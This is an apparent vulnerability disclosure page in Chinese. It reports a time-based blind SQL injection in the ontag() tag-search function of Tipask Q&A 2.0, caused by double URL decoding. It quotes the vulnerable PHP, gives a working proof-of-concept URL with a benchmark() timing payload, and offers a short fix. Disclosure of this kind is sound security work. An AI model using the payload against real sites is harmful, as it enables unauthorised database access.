漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:tipask问答系统2.0SQL时间盲注漏洞
提交时间:2013-09-15 12:35
修复时间:2013-10-30 12:35
公开时间:2013-10-30 12:35
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2013-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-10-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 其实我是来膜拜猪头子的
详细说明: 关于对get/post检测的部分,主要就是看猪头子大牛的: WooYun: tipask问答系统2.0 ajaxsearch二次编码注入漏洞 /model/question.php
function ontag() { $tag = urldecode($this->get['2']); //二次编码绕过 //echo $tag; $encodeword = urlencode($tag); $navtitle = $tag . '-标签搜索'; $qstatus = $status = intval($this->get[3]); (!$status) && ($qstatus = "1,2,6"); $startindex = ($page - 1) * $pagesize; $rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询
/lib/db.class.php function fetch_total($table,$where='1') { return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询 }
漏洞证明:
exp:http://host/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#");
修复方案:
function ontag() { $tag = $this->get['2'];
漏洞回应
漏洞评价:
评论
2013-09-15 15:27 |
Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)
2013-09-15 15:27 |
Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)
2013-09-15 21:11 |
养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)
2013-09-16 00:56 |
Kavia ( 实习白帽子 | Rank:50 漏洞数:10 )
2013-09-16 07:59 |
养乐多Ngan ( 普通白帽子 | Rank:652 漏洞数:72 | Hello,world.其实最大的漏洞,是人心。)
2013-09-16 15:07 |
猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)
2013-09-16 17:32 |
Kavia ( 实习白帽子 | Rank:50 漏洞数:10 )
2013-09-16 17:50 |
Evi1m0 ( 路人 | Rank:8 漏洞数:2 | 邪红色信息安全组织)